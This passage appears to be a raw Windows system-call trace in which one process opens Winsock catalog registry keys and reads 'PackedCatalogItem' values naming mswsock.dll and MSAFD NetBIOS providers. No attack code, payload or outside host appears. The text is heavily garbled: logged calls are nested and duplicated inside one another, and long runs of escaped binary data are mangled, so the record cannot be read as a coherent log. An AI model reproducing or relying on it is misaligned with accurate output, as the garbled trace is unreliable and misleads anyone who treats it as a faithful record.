\0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0B\0E\07\0E\00\06\0F\0-\06\02\00\0F\0-\04\0E\0A\0A\0-\0A\0\0\0\0\0\204\3\0\05\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\05\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\06\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\09\06\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\07\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\07\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\08\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 03637   456   NtClose  (480, ... ) == 0x0
 03638   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000009"}, ... 480, ) }, ... 480, ) == 0x0
 03639   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03640   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03641   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\361\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0B\0E\07\0E\00\06\0F\0-\06\02\00\0F\0-\04\0E\0A\0A\0-\0A\0\0\0\0\0\204\3\0\0:\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0:\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0;\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\00\0;\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0<\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0<\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0=\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\361\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0B\0E\07\0E\00\06\0F\0-\06\02\00\0F\0-\04\0E\0A\0A\0-\0A\0\0\0\0\0\204\3\0\0:\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0:\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0;\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\00\0;\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0<\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0<\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0=\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0<\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0=\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\361\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0B\0E\07\0E\00\06\0F\0-\06\02\00\0F\0-\04\0E\0A\0A\0-\0A\0\0\0\0\0\204\3\0\0:\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0:\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0;\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\00\0;\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0<\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0<\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0=\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 03642   456   NtClose  (480, ... ) == 0x0
 03643   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000010"}, ... 480, ) }, ... 480, ) == 0x0
 03644   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03645   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03646   456   NtAllocateVirtualMemory  (-1, 1511424, 0, 4096, 4096, 4, ... 1511424, 4096, ) == 0x0
 03647   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\362\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0D\01\09\0D\0F\08\08\02\0-\0A\09\0C\0B\0-\04\01\04\04\0-\08\0\0\0\0\0\204\3\0\0@\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0@\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0A\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\01\0A\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0B\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0B\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0C\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\362\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0D\01\09\0D\0F\08\08\02\0-\0A\09\0C\0B\0-\04\01\04\04\0-\08\0\0\0\0\0\204\3\0\0@\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0@\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0A\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\01\0A\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0B\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0B\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0C\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0B\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0C\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\362\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0D\01\09\0D\0F\08\08\02\0-\0A\09\0C\0B\0-\04\01\04\04\0-\08\0\0\0\0\0\204\3\0\0@\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0@\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0A\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\01\0A\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0B\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0B\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0C\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 03648   456   NtClose  (480, ... ) == 0x0
 03649   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000011"}, ... 480, ) }, ... 480, ) == 0x0
 03650   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03651   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03652   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\363\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0D\01\09\0D\0F\08\08\02\0-\0A\09\0C\0B\0-\04\01\04\04\0-\08\0\0\0\0\0\204\3\0\0E\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0E\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0F\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\1\0\0F\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0G\16\0\0\304\1\0\0\310\1\0\0\305\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\320\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0G\16\0\0\304\1\0\0\310\1\0\0\305\0\0\0\1\0\1\0\2\1\0\0\0\0\0\0H\16\0\0\304\1\0\0\310\1\0\0\25\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\3\0\37\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0H\16\0\0\304\1\0\0\310\1\0\0\25\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\1\0\0I\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0T\0\0\0\0\0\0\2\0\0\0\0\30\0\0\0\324\1\0\0\30\343\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$\0&\0\340\346\26\0\0\0\0\0N\0a\0m\0e\0S\0p\0a\0c\0e\0_\0C\0a\0t\0a\0l\0o\0g\05\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\363\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0D\01\09\0D\0F\08\08\02\0-\0A\09\0C\0B\0-\04\01\04\04\0-\08\0\0\0\0\0\204\3\0\0E\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0E\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0F\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\1\0\0F\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0G\16\0\0\304\1\0\0\310\1\0\0\305\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\320\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0G\16\0\0\304\1\0\0\310\1\0\0\305\0\0\0\1\0\1\0\2\1\0\0\0\0\0\0H\16\0\0\304\1\0\0\310\1\0\0\25\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\3\0\37\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0H\16\0\0\304\1\0\0\310\1\0\0\25\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\1\0\0I\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0T\0\0\0\